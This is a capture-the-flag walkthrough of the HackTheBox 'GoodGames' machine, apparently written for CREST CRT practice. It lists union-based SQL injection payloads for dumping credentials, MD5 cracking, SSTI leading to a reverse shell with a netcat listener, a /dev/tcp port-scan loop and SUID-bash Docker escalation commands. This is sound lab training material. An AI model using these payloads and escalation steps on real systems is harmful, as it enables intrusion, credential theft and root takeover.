We covered HackTheBox GoodGames as part of CREST CRT track. We went over SQL Injection, server side template injection and Docker privilege escalation.
Initial Reconnaissance and SQL Injection
I started by identifying that the target machine was running a web server on port 80. I discovered a login page and attempted to bypass authentication using SQL injection. I used Burp Suite to intercept the login request and modified the email field with an SQL injection payload. I successfully logged in as the admin.
To dump the database, I used union-based SQL injection payloads. I found the number of columns using payloads like UNION SELECT 1,2,3 and UNION SELECT 1,2,3,4. I then found the database name using UNION SELECT 1,2,3,database(). To find schema names, I used UNION SELECT 1,2,3,group_concat(schema_name) FROM information_schema.schemata. I found table names with UNION SELECT 1,2,3,group_concat(table_name) FROM information_schema.tables WHERE table_schema='main', where ‘main’ was the database name I discovered earlier. I then found column names by targeting the ‘user’ table: UNION SELECT 1,2,3,group_concat(column_name) FROM information_schema.columns WHERE table_name='user'. Finally, I dumped the data to get user credentials with UNION SELECT 1,2,3,group_concat(id, name, password) FROM user. I extracted an MD5 hash for the admin user.
I used John the Ripper to crack the hash: john --format=raw-md5 hashfile. The cracked password was “super administrator”.
Server-Side Template Injection (SSTI)
After logging in as admin with the cracked password, I found an admin dashboard. I identified that the server was Python-based (Flask was hinted, and an Nmap scan confirmed Python). I tested for SSTI in an input field (full name) on the admin profile page using the payload {{7*7}}. Since it evaluated to 49, SSTI was confirmed.
I then used a Python SSTI payload to confirm the current user ID (which was root). Next, I used another Python SSTI payload to get a reverse shell. I started a Netcat listener using nc -lvp 4545 to catch the shell.
Docker Privilege Escalation
The reverse shell landed me in a Docker container as the root user. I stabilized the shell using script /dev/null -c bash and stty raw -echo; fg (followed by Enter, then reset and export TERM=xterm). I noticed a .dockerenv file, indicating I was in a Docker environment. I found that the /home/austos directory was mounted from the host machine by checking mounts with mount | grep austos.
To find the host IP, I performed network scanning within Docker using a for loop to ping sweep the local Docker network: for i in $(seq 1 254); do ping -c 1 172.19.0.$i | grep "bytes from"; done. I then port scanned the identified host IP (Docker host) with another for loop: for port in $(seq 1 65535); do (echo > /dev/tcp/172.19.0.1/$port) >/dev/null 2>&1 && echo "Port $port is open"; done. This revealed ports 22 (SSH) and 80 were open.
I SSHed to the Docker Host using ssh austos@172.19.0.1 with the previously cracked password “super administrator”.
For privilege escalation, I had previously copied the /bin/bash binary from the host to the mounted /home/austos directory while on the host. From within the Docker container, I changed the ownership of this copied bash binary to root: chown root:root bash. Then, I set the SUID bit on the bash binary: chmod u+s bash. Back on the Docker host (via the SSH session), I executed the SUID bash binary from the mounted directory: ./bash -p (the -p flag was crucial to preserve permissions and effectively use the SUID bit). This granted me a root shell on the host machine.
Finally, I confirmed root access with id, navigated to /root with cd /root, and found the flag with ls.
Technical Commands
Here are the technical commands I used:
john --format=raw-md5 hashfilenc -lvp 4545script /dev/null -c bashstty raw -echo; fgresetexport TERM=xtermmount | grep austosfor i in $(seq 1 254); do ping -c 1 172.19.0.$i | grep "bytes from"; donefor port in $(seq 1 65535); do (echo > /dev/tcp/172.19.0.1/$port) >/dev/null 2>&1 && echo "Port $port is open"; donessh austos@172.19.0.1chown root:root bashchmod u+s bash./bash -pidcd /rootls
